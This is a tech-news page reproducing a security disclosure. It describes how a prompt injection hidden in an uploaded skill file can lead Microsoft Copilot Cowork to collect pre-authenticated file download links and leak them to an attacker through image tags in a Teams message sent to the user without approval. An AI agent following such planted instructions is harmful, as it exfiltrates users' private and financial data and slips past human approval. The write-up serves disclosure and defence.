Skip to content
Tech News
← Back to articles

Microsoft Copilot Cowork Exfiltrates Files

read original get Microsoft 365 Copilot → more articles
Why This Matters

This article highlights a significant security concern with Microsoft 365's Copilot Cowork feature, demonstrating how attackers can exploit prompt injection vulnerabilities to exfiltrate sensitive files and data. The findings underscore the importance of scrutinizing integrated AI systems that operate with broad permissions, as they can inadvertently expand attack surfaces and pose risks to enterprise data security. As AI-driven tools become more prevalent, understanding and mitigating these vulnerabilities is crucial for protecting user and organizational information.

Key Takeaways

This attack achieved a high success rate against state-of-the-art models, including Claude Opus 4.7.

Copilot Cowork is a Frontier feature available now in Microsoft 365. It operates with the users’ Microsoft permissions and can use Microsoft Graph to read and operate on data in one’s Microsoft tenant.

In this article, we demonstrate that through an indirect prompt injection in a poisoned skill, attackers can exfiltrate files from M365. This is done by exploiting the fact that, unlike other sensitive actions, sending emails and Teams messages to the active user does not require human approval, and opening the compromised messages in Teams or Outlook can trigger attacker-controlled network requests.

This risk reflects that giving agents access to multiple systems expands the prompt-injection attack surface. In isolation, the agent’s intended capabilities are benign; however, due to the properties of the integrated systems, users are at risk. This is reminiscent of our previous work on how URL previews in communications apps have become an egress surface for agents . As this risk pertains to the design of a system in which agents act with delegated authority across an entire enterprise ecosystem, rather than to a specific bug, we are publicizing this work to inform users of the risks they are accepting by using an agentic product of this nature.

Separate from this risk, we have disclosed a vulnerability to Microsoft that directly allows data egress from Copilot Cowork’s sandbox environment.

Microsoft’s documentation on action approvals states, “[Copilot] Cowork asks for your permission before taking sensitive actions, like sending an email or posting a message in Teams.” However, in practice, when the recipient is the active user, these actions execute immediately without requiring human approval (users do not have a setting to modify this behavior). Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent. Copilot Cowork can retrieve ‘pre-authenticated download links’ for files the user has access to, which allow anyone who opens the link to download that file. So, a manipulated agent can exfiltrate files by exfiltrating pre-authenticated download links.

The victim has access to files stored in SharePoint or OneDrive containing PII & Financial data

The victim uploads a skill file to Copilot Cowork that contains a prompt injection For general use cases, this is quite common; a user finds a file online that they upload as a skill. This attack is not dependent on the injection source - other injection sources include, but are not limited to: web data from Claude for Chrome, connected MCP servers, etc. Note: Admins have limited oversight of ‘Skills’, as Skills in Copilot Cowork are automatically loaded from a specific path in a user’s OneDrive.

The victim asks Microsoft Copilot Cowork to review what they worked on that week, triggering the skill

The injection manipulates Microsoft Copilot Cowork to post a Teams message that will exfiltrate pre-authenticated file download links when it is viewed The injection tells Copilot Cowork that a service exists to create document previews for the recap message; to do this, the agent retrieves pre-authenticated file download links for each file and passes those URLs as query parameters to an attacker-controlled site via malicious HTML image tags. At no point in this process is human approval required. If we expand the ‘Task complete’ block, we can see the agent’s actions play out – but the malicious message content is never visible, even when the Teams action is clicked on.

... continue reading